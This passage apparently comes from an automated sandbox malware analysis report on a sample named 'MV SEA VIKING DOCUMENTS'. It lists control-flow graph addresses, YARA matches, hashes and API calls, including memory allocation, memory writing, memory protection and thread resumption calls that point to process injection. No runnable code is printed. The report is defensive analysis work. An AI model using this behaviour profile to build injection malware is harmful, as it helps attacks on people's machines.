                                                                                                                                                                                                                                control_flow_graph 442 405c49-405c6f call 405f14 445 405c71-405c83 DeleteFileW 442->445 446 405c88-405c8f 442->446 449 405e05-405e09 445->449 447 405c91-405c93 446->447 448 405ca2-405cb2 call 40653d 446->448 450 405db3-405db8 447->450 451 405c99-405c9c 447->451 455 405cc1-405cc2 call 405e58 448->455 456 405cb4-405cbf lstrcatW 448->456 450->449 454 405dba-405dbd 450->454 451->448 451->450 457 405dc7-405dcf call 406873 454->457 458 405dbf-405dc5 454->458 459 405cc7-405ccb 455->459 456->459 457->449 466 405dd1-405de5 call 405e0c call 405c01 457->466 458->449 462 405cd7-405cdd lstrcatW 459->462 463 405ccd-405cd5 459->463 465 405ce2-405cfe lstrlenW FindFirstFileW 462->465 463->462 463->465 467 405d04-405d0c 465->467 468 405da8-405dac 465->468 482 405de7-405dea 466->482 483 405dfd-405e00 call 40559f 466->483 471 405d2c-405d40 call 40653d 467->471 472 405d0e-405d16 467->472 468->450 470 405dae 468->470 470->450 484 405d42-405d4a 471->484 485 405d57-405d62 call 405c01 471->485 476 405d18-405d20 472->476 477 405d8b-405d9b FindNextFileW 472->477 476->471 481 405d22-405d2a 476->481 477->467 480 405da1-405da2 FindClose 477->480 480->468 481->471 481->477 482->458 486 405dec-405dfb call 40559f call 4062fd 482->486 483->449 484->477 487 405d4c-405d55 call 405c49 484->487 495 405d83-405d86 call 40559f 485->495 496 405d64-405d67 485->496 486->449 487->477 495->477 499 405d69-405d79 call 40559f call 4062fd 496->499 500 405d7b-405d81 496->500 499->477 500->477
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(?,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,\*.*), ref: 00405CBA
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                • String ID: .$.$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Stuffiness7.dat$\*.*
                                                                                                                                                                                                                                • API String ID: 2035342205-3920725043
                                                                                                                                                                                                                                • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                                                                                                                                                                • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0245FC11 Relevance: 12.1, APIs: 2, Strings: 4, Instructions: 1575COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 649 245fc11-245fdb2 call 245dbb3 * 2 call 24618ab GetPEB call 2460b17 662 2460542-2460545 649->662 663 245fdb8-245fe3a call 245fdcb 649->663 668 2461835-2461839 663->668 669 245fe40-245fe56 663->669 670 246183a-24618a0 668->670 671 24519e1-24519f3 call 245179b 669->671 672 245fe5c-245fe8b 669->672 677 24618a2-24618a4 670->677 679 245197d-245199c 671->679 680 245d2ef-245d474 call 245db0f 671->680 672->671 675 245fe91-2460019 672->675 685 246001d-246002a 675->685 679->671 729 245d476-245d54d 680->729 688 2460030-246003c 685->688 689 2460548-246055a 685->689 692 2460042-2460065 688->692 693 24592ef-2459314 688->693 690 246055e-246056b 689->690 694 2460571-2460581 690->694 695 246089f-24608ac 690->695 692->685 699 2460067-2460079 692->699 696 245dbb3-245dc60 693->696 697 245931a-245986b call 245fc11 call 245db94 call 24610e5 693->697 694->690 700 2460583-24605f5 694->700 702 24608b0-24608f0 695->702 707 245dc66-245dd17 call 245dc88 call 245e40e call 245dd2d 696->707 708 245dd19-245dd1c LoadLibraryA call 245dd2d 696->708 811 245a816-245a93b call 24610e5 * 3 697->811 812 2459871-245995c call 245dbb3 call 24610e5 call 245a941 697->812 699->685 705 246007b-246008c 699->705 700->693 713 24605fb-2460605 700->713 715 24608f6-246092e 702->715 716 2460adc-2460b0e call 2460b17 702->716 705->685 712 246008e-24600d2 705->712 707->708 721 245dd21-245dd29 708->721 722 2451a45-2451a46 712->722 723 24600d8-24600ff 712->723 713->690 725 246060b-246063c 713->725 715->702 727 2460930-2460960 715->727 716->668 730 2460101-246015b 723->730 725->690 732 2460642-24606aa 725->732 727->702 734 2460966-24609c4 727->734 750 245d553-245d5a6 729->750 744 246015d-2460187 730->744 745 2460189-24601c5 730->745 747 24606ac-24606be 732->747 734->702 749 24609ca-24609f0 734->749 751 24601eb-2460241 744->751 745->751 760 24601c7-24601ea 745->760 754 24606c4-24606db 747->754 755 24607fa-246086d 747->755 757 24609f5-2460a46 749->757 750->671 768 245d5ac-245d651 750->768 751->696 769 2460247-2460264 751->769 763 24606e1-2460787 754->763 764 2460789-24607df 754->764 755->747 767 2460873-246089c call 2460b17 755->767 774 2460a66-2460ad6 757->774 775 2460a48-2460a65 757->775 760->751 763->764 789 24607e1-24607f9 763->789 764->755 779 24603de-24603ee 769->779 780 246026a-2460298 769->780 774->716 774->757 775->774 784 24603f4-246040b 779->784 785 2460483-2460494 779->785 780->779 787 246029e-246031c 780->787 784->785 790 246040d-2460480 784->790 785->693 791 246049a-24604c2 785->791 796 246031e-2460330 787->796 789->755 790->785 791->730 795 24604c8-246052b 791->795 795->671 801 2460531-2460540 call 2460b17 795->801 796->796 799 2460332-2460348 796->799 799->796 802 246034a-24603c8 799->802 801->662 802->696 807 24603ce-24603d7 802->807 807->796 810 24603dd 807->810 810->779 811->696 812->671 827 2459962-2459d00 call 245db0f call 24610e5 812->827 827->811 840 2459d06-2459e9a 827->840 840->696 844 2459ea0-2459ee1 call 24610e5 840->844 844->811 847 2459ee7-245a188 call 24610e5 844->847 847->811 854 245a18e-245a1e8 847->854 854->693 856 245a1ee-245a203 854->856 856->811 857 245a209-245a23a 856->857 858 245a23c-245a299 857->858 859 245a29f-245a2b1 857->859 858->811 858->859 859->693 861 245a2b7-245a2c4 859->861 861->811 862 245a2ca-245a43a 861->862 862->696 865 245a440-245a4ba call 245e122 862->865 865->811 869 245a4c0-245a597 call 2461835 NtWriteVirtualMemory 865->869 869->811 873 245a59d-245a6a5 call 24610e5 869->873 873->811 878 245a6ab-245a74f call 24610e5 873->878 878->811 882 245a755-245a815 call 24610e5 878->882
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoadMemoryProtectVirtual
                                                                                                                                                                                                                                • String ID: ?~6$`\5z$dX.F$C
                                                                                                                                                                                                                                • API String ID: 3389902171-2019787811
                                                                                                                                                                                                                                • Opcode ID: e75703e78556f527a026b136a5bdc93621ca6d0395fcdbb7fc45e3bf14493fb5
                                                                                                                                                                                                                                • Instruction ID: 477353243d3fdcc716c95d50bd20222e1365fd23ac77013417fcadf72d3e0094
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e75703e78556f527a026b136a5bdc93621ca6d0395fcdbb7fc45e3bf14493fb5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38D21571604386CFDF359E38CD987EA7BA2AF56350F45822ECCD98B295D3308586CB52
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02458BDC Relevance: 9.7, APIs: 2, Strings: 3, Instructions: 961COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 894 2458bdc-2458c51 GetPEB 896 2458e54-2458e57 894->896 897 2458c57-2458c8a 894->897 898 24592ef-2459314 896->898 899 2458c90-2458d15 897->899 900 245dbb3-245dc60 898->900 901 245931a-245986b call 245fc11 call 245db94 call 24610e5 898->901 905 2458dc6-2458df3 899->905 906 2458d1b-2458dbf 899->906 908 245dc66-245dd17 call 245dc88 call 245e40e call 245dd2d 900->908 909 245dd19-245dd29 LoadLibraryA call 245dd2d 900->909 942 245a816-245a93b call 24610e5 * 3 901->942 943 2459871-245995c call 245dbb3 call 24610e5 call 245a941 901->943 905->900 907 2458df9-2458e02 905->907 906->898 918 2458dc5 906->918 907->899 912 2458e08-2458e52 907->912 908->909 912->896 918->905 942->900 958 24519e1-24519f3 call 245179b 943->958 959 2459962-2459d00 call 245db0f call 24610e5 943->959 966 245197d-245199c 958->966 967 245d2ef-245d474 call 245db0f 958->967 959->942 984 2459d06-2459e9a 959->984 966->958 987 245d476-245d54d 967->987 984->900 993 2459ea0-2459ee1 call 24610e5 984->993 994 245d553-245d5a6 987->994 993->942 999 2459ee7-245a188 call 24610e5 993->999 994->958 998 245d5ac-245d651 994->998 999->942 1008 245a18e-245a1e8 999->1008 1008->898 1010 245a1ee-245a203 1008->1010 1010->942 1011 245a209-245a23a 1010->1011 1012 245a23c-245a299 1011->1012 1013 245a29f-245a2b1 1011->1013 1012->942 1012->1013 1013->898 1015 245a2b7-245a2c4 1013->1015 1015->942 1016 245a2ca-245a43a 1015->1016 1016->900 1019 245a440-245a4ba call 245e122 1016->1019 1019->942 1023 245a4c0-245a597 call 2461835 NtWriteVirtualMemory 1019->1023 1023->942 1027 245a59d-245a6a5 call 24610e5 1023->1027 1027->942 1032 245a6ab-245a74f call 24610e5 1027->1032 1032->942 1036 245a755-245a815 call 24610e5 1032->1036
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: )IpI$dX.F$C
                                                                                                                                                                                                                                • API String ID: 0-3008493083
                                                                                                                                                                                                                                • Opcode ID: 064b195e7c7b1ddeef5aed929db5f5973d476377a5f91596af3a2f1d6db5121b
                                                                                                                                                                                                                                • Instruction ID: 4c12b76d99bfeecdb9e48307803f1cb3feecd0b01b0cb6c2f189700dd2be9ee8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 064b195e7c7b1ddeef5aed929db5f5973d476377a5f91596af3a2f1d6db5121b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F382217160435ADFDF349E38C9947EA7BA2BF55350F45822EDCCA8B255D3308A86CB42
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02452FC1 Relevance: 8.1, APIs: 1, Strings: 3, Instructions: 1052COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1047 2452fc1-2452fee 1048 2451a45-2451a46 1047->1048 1049 2452ff4-24530ed 1047->1049 1052 24530f3-2453165 call 24610e5 1049->1052 1053 24592ef-2459314 1049->1053 1060 245343b-245344c 1052->1060 1061 245316b-24531db 1052->1061 1055 245dbb3-245dc60 1053->1055 1056 245931a-245986b call 245fc11 call 245db94 call 24610e5 1053->1056 1062 245dc66-245dd17 call 245dc88 call 245e40e call 245dd2d 1055->1062 1063 245dd19-245dd29 LoadLibraryA call 245dd2d 1055->1063 1120 245a816-245a93b call 24610e5 * 3 1056->1120 1121 2459871-245995c call 245dbb3 call 24610e5 call 245a941 1056->1121 1060->1053 1070 24531dd-24532e3 call 24531fa call 245ded8 1061->1070 1062->1063 1091 24532e5-2453320 1070->1091 1092 245333e-2453346 1070->1092 1095 245f4c2-245f4cf call 245f4c9 1091->1095 1099 2453326-245332b 1091->1099 1092->1095 1096 245334c-2453351 1092->1096 1110 245f4d2-245f549 1095->1110 1096->1095 1100 2453357-245335c 1096->1100 1099->1095 1103 2453331-2453336 1099->1103 1100->1095 1104 2453362-2453367 1100->1104 1103->1095 1107 245333c 1103->1107 1104->1095 1108 245336d-2453401 call 24533de 1104->1108 1107->1092 1108->1070 1123 2453407-245341c 1108->1123 1118 245f54b-245f7af call 245f5cb 1110->1118 1120->1055 1144 24519e1-24519f3 call 245179b 1121->1144 1145 2459962-2459d00 call 245db0f call 24610e5 1121->1145 1152 245197d-245199c 1144->1152 1153 245d2ef-245d474 call 245db0f 1144->1153 1145->1120 1170 2459d06-2459e9a 1145->1170 1152->1144 1173 245d476-245d54d 1153->1173 1170->1055 1179 2459ea0-2459ee1 call 24610e5 1170->1179 1180 245d553-245d5a6 1173->1180 1179->1120 1185 2459ee7-245a188 call 24610e5 1179->1185 1180->1144 1184 245d5ac-245d651 1180->1184 1185->1120 1194 245a18e-245a1e8 1185->1194 1194->1053 1196 245a1ee-245a203 1194->1196 1196->1120 1197 245a209-245a23a 1196->1197 1198 245a23c-245a299 1197->1198 1199 245a29f-245a2b1 1197->1199 1198->1120 1198->1199 1199->1053 1201 245a2b7-245a2c4 1199->1201 1201->1120 1202 245a2ca-245a43a 1201->1202 1202->1055 1205 245a440-245a4ba call 245e122 1202->1205 1205->1120 1209 245a4c0-245a597 call 2461835 NtWriteVirtualMemory 1205->1209 1209->1120 1213 245a59d-245a6a5 call 24610e5 1209->1213 1213->1120 1218 245a6ab-245a74f call 24610e5 1213->1218 1218->1120 1222 245a755-245a815 call 24610e5 1218->1222
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: `wI$dX.F$C
                                                                                                                                                                                                                                • API String ID: 0-1454560376
                                                                                                                                                                                                                                • Opcode ID: 40c377021ed586e05acd33ba2c4dadd97a09590d0a31a3ae155eb50fe426c926
                                                                                                                                                                                                                                • Instruction ID: a8f48631e772d0a8e39e62b83a81cfabfbd5c25788b0299743a48477705f0f4e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40c377021ed586e05acd33ba2c4dadd97a09590d0a31a3ae155eb50fe426c926
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C992207160435ADFDB349E38C9A87EA77A2FF55390F45422EDCCA9B250D3344A86CB42
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0245B2A6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 226memorynativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1227 245b2a6-245b2b5 1228 245b561-245b5e5 1227->1228 1229 245b2bb-245b508 call 245dbb3 1227->1229 1233 2461835-2461839 1228->1233 1234 245b5eb-245b705 call 245db2d call 245b5ff 1228->1234 1246 2451a45-2451a46 1229->1246 1247 245b50e-245b55e NtAllocateVirtualMemory 1229->1247 1236 246183a-24618a0 1233->1236 1250 245b706-245b70d 1234->1250 1242 24618a2-24618a4 1236->1242 1247->1228 1250->1250 1251 245b70f-245b71c 1250->1251 1252 245b77d-245b782 1251->1252 1253 245b71e-245b759 1251->1253 1254 245b783-245b7c2 1252->1254 1253->1254 1254->1233
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0245DBB3: LoadLibraryA.KERNELBASE(B2B1C27B), ref: 0245DD19
                                                                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(-0000000173D1F5F2,?,-6BB0B5A4), ref: 0245B53B
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                                                                                                                                                                • String ID: #4o$M{O$d5z7
                                                                                                                                                                                                                                • API String ID: 2616484454-573927798
                                                                                                                                                                                                                                • Opcode ID: 4e04c6bd9bfc3009842486ffa462f983423fe345d09862f95fae1223a5df4c0f
                                                                                                                                                                                                                                • Instruction ID: 9ecd2ff213f6e537153ea33d0220d663cbaf19affafaf0bc3b961c378b71fa14
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e04c6bd9bfc3009842486ffa462f983423fe345d09862f95fae1223a5df4c0f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6715AB21407899BCB318E288C95BEF7AF29FD6748FA8415EDC899B216E3324543C711
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0245F5CB Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 876COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: dX.F$C
                                                                                                                                                                                                                                • API String ID: 0-751493344
                                                                                                                                                                                                                                • Opcode ID: bdc76c11376674ecedb6c183043de3d417186f32f339cdd5fde2d183bd1b7a0f
                                                                                                                                                                                                                                • Instruction ID: 802cd851ac90e5e5a4f978726038cb783b5cc857a1c64cd4454db5bdf451ffb9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bdc76c11376674ecedb6c183043de3d417186f32f339cdd5fde2d183bd1b7a0f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF72FF7160435ADFDF349E38C9A87EA7BA2BF55350F45422EDCCA9B254D3304A86CB42
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00406873 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(76F73420,004302B8,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,00405F5D,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040688A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp, xrefs: 00406873
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp
                                                                                                                                                                                                                                • API String ID: 2295610775-4141617732
                                                                                                                                                                                                                                • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                                                                                                                                • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 02460B17 Relevance: 3.1, APIs: 2, Instructions: 99librarynativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(B2B1C27B), ref: 0245DD19
                                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(2348C063,?,?,?,?,0245FD48,166B4E76,02459508), ref: 02460C29
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoadMemoryProtectVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3389902171-0
                                                                                                                                                                                                                                • Opcode ID: a0660e06764b7d2fb85da728abd28d7a6242afb5d65331fca36c53874cff23d3
                                                                                                                                                                                                                                • Instruction ID: 64f1353298825d1c3084cb7c7b3f6f2bb54684f007a0cddc1e82b9077daba953
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0660e06764b7d2fb85da728abd28d7a6242afb5d65331fca36c53874cff23d3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B31F271A4024ADFDF30DE698D98BEE73EAAF94610F94412BDC49CB300D3309A42CB11
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 0245BF4C Relevance: 1.5, APIs: 1, Instructions: 47libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LdrInitializeThunk.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02452B6A), ref: 0245C54F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: d43e9524b3d960df7a749b66b5f8257a27218079c7472daf81f7afc5992c86e3
                                                                                                                                                                                                                                • Instruction ID: 72b71a6e6195d5243a40691f7b43405ccbc2cb44b038351c065dd3d2d3c81b5f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d43e9524b3d960df7a749b66b5f8257a27218079c7472daf81f7afc5992c86e3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 860146D25C83C621860296B9580FF1BBEF94D83D4CB2846DEAC801B14BC61B2106E771
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 024610EA Relevance: 1.5, APIs: 1, Instructions: 45nativethreadCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtResumeThread.NTDLL(?,-5B147469,A3E57FEF), ref: 024612CC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
